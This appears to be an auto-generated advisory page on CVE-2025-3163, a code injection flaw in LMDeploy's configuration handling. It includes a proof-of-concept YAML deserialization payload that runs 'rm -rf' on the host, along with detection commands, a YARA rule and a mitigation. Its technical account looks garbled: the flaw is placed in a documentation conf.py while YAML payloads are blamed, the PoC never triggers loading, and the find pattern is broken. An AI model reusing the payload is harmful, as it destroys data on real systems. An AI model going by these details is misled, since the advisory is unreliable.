Listen to this Post
How CVE-2025-3163 Works
The vulnerability exists in LMDeploy’s configuration file parsing logic within lmdeploy/docs/en/conf.py. When processing the `Open()` function, improper input validation allows arbitrary Python code execution through crafted configuration files. Attackers can inject malicious code via specially formatted YAML/JSON payloads that get evaluated during runtime. The vulnerability triggers when LMDeploy loads project configurations, enabling local privilege escalation or system compromise through the application’s execution context. Since the attack vector is local, it requires initial access but can lead to full host takeover.
DailyCVE Form
Platform: LMDeploy
Version: <= 0.7.1
Vulnerability: Code Injection
Severity: Critical
Date: 04/23/2025
What Undercode Say:
Exploitation:
Proof-of-Concept exploit
malicious_conf = """
!!python/object/apply:os.system
args: ['rm -rf /critical/path']
"""
with open('exploit.conf', 'w') as f:
f.write(malicious_conf)
Detection:
Check vulnerable versions
pip show lmdeploy | grep Version
grep -r "open(" /path/to/lmdeploy/docs/en/conf.py
Mitigation:
Safe config parsing patch import yaml from yaml import SafeLoader def safe_open(config_path): with open(config_path) as f: return yaml.load(f, Loader=SafeLoader)
Network Indicators:
N/A (Local exploit)
Forensic Artifacts:
Check for malicious configs
find / -name ".conf" -exec grep -l "!!python" {} +
Remediation Steps:
1. Upgrade to LMDeploy 0.7.2+
2. Audit all configuration files
3. Restrict config file permissions
YARA Rule:
rule lmdeploy_code_injection {
strings:
$pattern = "!!python/" nocase
condition:
filesize < 1MB and $pattern
}
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
